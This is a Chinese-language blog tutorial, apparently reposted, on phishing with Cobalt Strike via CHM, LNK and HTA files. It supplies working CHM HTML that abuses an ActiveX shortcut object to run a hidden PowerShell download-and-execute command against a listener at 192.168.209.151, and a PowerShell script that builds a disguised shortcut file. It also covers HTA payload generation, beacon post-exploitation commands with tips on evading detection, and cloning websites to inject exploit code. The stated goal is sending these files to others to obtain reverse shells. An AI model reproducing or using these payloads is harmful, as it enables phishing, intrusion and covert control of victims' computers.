CHM釣魚

CHM介紹

CHM（Compiled Help Manual）即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式，利用HTML作源文，把幫助內(nèi)容以類似數(shù)據(jù)庫的形式編譯儲存。
利用CHM釣魚主要原因是因為該文檔可以執(zhí)行cmd命令
?

這里制作CHM需要用到一個工具就是? EasyCHM

?

CHM制作過程：
創(chuàng)建一個文件夾（名字隨意），在文件夾里面再創(chuàng)建兩個文件夾（名字隨意）和一個index.html文件，在兩個文件夾內(nèi)部創(chuàng)建各創(chuàng)建一個index.html文件。

先將下列代碼復(fù)制到根文件夾中的index.html中。

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',calc.exe'><PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

打開我們的EasyCHM工具

后點擊新建

然后導(dǎo)入自己創(chuàng)建的文件夾，點擊確定后再點擊編譯，在彈出的對話框中點擊生成CHM按鈕

它會給你生產(chǎn)一個CHM文件，給別人發(fā)過去，一旦點擊就會給彈出計算機

生產(chǎn)釣魚文件

啟動Cobalt Strike，點擊attacks——>web Drive by——>scripted web Delivery在彈出的對話框中將type類型設(shè)置為powershell然后單擊launch按鈕

再用代碼將上面創(chuàng)建的根文件夾中的index.html代碼中的calc.exe替換掉。

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.209.151:81/aa'))"><PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

生產(chǎn)CHM發(fā)送給別人，點擊后獲得反彈的shell

LNK釣魚

lnk文件是用于指向其他文件的一種文件。這些文件通常稱為快捷方式文件，通常它以快捷方式放在硬盤上，以方便使用者快速的調(diào)用。
lnk釣魚主要將圖標偽裝成正常圖標，但是目標會執(zhí)行shell命令。

?

先做個簡單的powershell生產(chǎn)圖標：
創(chuàng)建個txt文本寫入下面代碼然后改文件后綴名為.ps1。

cmd /c calc.exe

右鍵文件powershell運行后會彈出計算器

釣魚方法：

首先通過Cobalt Strike的attacks——>web Drive by——>scripted web Delivery

tpye類型為powershell，然后單機launch。生產(chǎn)代碼。

還記的上面做的那個簡單的powershell么，后綴改回txt，將生成的代碼替換掉calc.exe

將下面的powershell代碼寫入.ps1文件，右鍵運行powershell。

$file = Get-Content "test.txt" $WshShell = New-Object -comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut("test.lnk") $Shortcut.TargetPath = "%SystemRoot%\system32\cmd.exe" $Shortcut.IconLocation = "%SystemRoot%\System32\Shell32.dll,21" $Shortcut.Arguments = ' '+ $file $Shortcut.Save()

生成test.lnk文件，而且圖標改了（powershell執(zhí)行文件要和test.txt要在一個目錄下，這個圖標所在位置就在%SystemRoot%\System32\Shell32.dll目錄下）

后將test.lnk發(fā)送給他人，獲得反彈shell。

HTA釣魚?

HTA是HTML Application的縮寫，直接將HTML保存成HTA的格式，是一個獨立的應(yīng)用軟件。
HTA雖然用HTML、JS和CSS編寫，卻比普通網(wǎng)頁權(quán)限大得多，它具有桌面程序的所有權(quán)限。
就是一個html應(yīng)用程序，雙擊就能運行。
?

Cobalt Strike，attacks——>packages——>HTML application

?

選擇powershell然后單機generate，選擇保存路徑。

將生成的.hta文件發(fā)送給別人，點擊后獲得shell

后滲透階段

相信你已經(jīng)能拿到一個beacon的shell了。

下面是一些基本的使用命令，但是cs監(jiān)聽器對中文支持并不友好，會對中文產(chǎn)生亂碼。

---

?

help 查看beacon shell所有內(nèi)置命令幫助,如果想查看指定命令的用法,可以這樣,eg: help checkin
note 給當前目錄機器起個名字, eg: note beacon-shell
cd 在目標系統(tǒng)中切換目錄,注意在win系統(tǒng)中切換目錄要用雙反斜杠,或者直接用'/' eg: cd c:\\
mkdir 新建目錄, eg: mkdir d:\\beacon
rm 刪除文件或目錄, eg: rm d:\\beacon
upload 上傳文件到目標系統(tǒng)中
download 從目標系統(tǒng)下載指定文件,eg: download C:\\Users\\win7cn\\Desktop\\putty.exe
cancel 取消下載任務(wù),比如,一個文件如果特別大,下載可能會非常耗時,假如中途你不想繼續(xù)下了,就可以用這個取消一下
shell 在目標系統(tǒng)中執(zhí)行指定的cmd命令, eg: shell whoami
getuid 查看當前beacon 會話在目標系統(tǒng)中的用戶權(quán)限,可能需要bypassuac或者提權(quán)
pwd 查看當前在目錄系統(tǒng)中的路徑
ls 列出當前目錄下的所有文件和目錄
drives 列表出目標系統(tǒng)的所有分區(qū)[win中叫盤符]
ps 查看目標系統(tǒng)當前的所有的進程列表
kill 殺掉指定進程, eg: kill 4653
sleep 10 指定被控端休眠時間,默認60秒一次回傳,讓被控端每10秒來下載一次任務(wù),實際中頻率不宜過快,容易被發(fā)現(xiàn),80左右一次即可
jobs 列出所有的任務(wù)列表,有些任務(wù)執(zhí)行時間可能稍微較長,此時就可以從任務(wù)列表中看到其所對應(yīng)的具體任務(wù)id,針對性的清除
jobkill 如果發(fā)現(xiàn)任務(wù)不知是何原因長時間沒有執(zhí)行或者異常,可嘗試用此命令直接結(jié)束該任務(wù), eg: jobkill 1345
clear 清除beacon內(nèi)部的任務(wù)隊列
checkin 強制讓被控端回連一次
exit 終止當前beacon 會話
ctrl + k 清屏

---

有些可能會觸發(fā)敏感api導(dǎo)致防護報警,另外進程注入,被控端可能感到非常明顯的卡頓,工具也有許多不完善的地方

?網(wǎng)站克隆

Cobalt Strike還能夠?qū)崿F(xiàn)網(wǎng)站克隆
cotalt strike能夠快速復(fù)制目標網(wǎng)站前端頁面，并且復(fù)制相識度極高
cotalt strike同時還可以在復(fù)制的網(wǎng)站中插入惡意代碼，如果本地瀏覽器帶有漏洞的用戶，可以直接控制目標機器。
點擊attacks——>Web Drive-by——>Clone site

• Clone URL：克隆目標網(wǎng)站的URL（如果網(wǎng)站不是80端口的話域名后得跟上端口號。）
• 注意問題：URL需要添加http協(xié)議和端口（81）
• Local URL：本地克隆路徑
• Local Host：本地主機IP
• Local Port：本地端口
• Attack：克隆后目標網(wǎng)站執(zhí)行腳本，如：flash漏洞

?

?

轉(zhuǎn)載于:https://www.cnblogs.com/-qing-/p/10900454.html

總結(jié)

以上是生活随笔為你收集整理的Cobalt Strike之CHM、LNK、HTA钓鱼的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。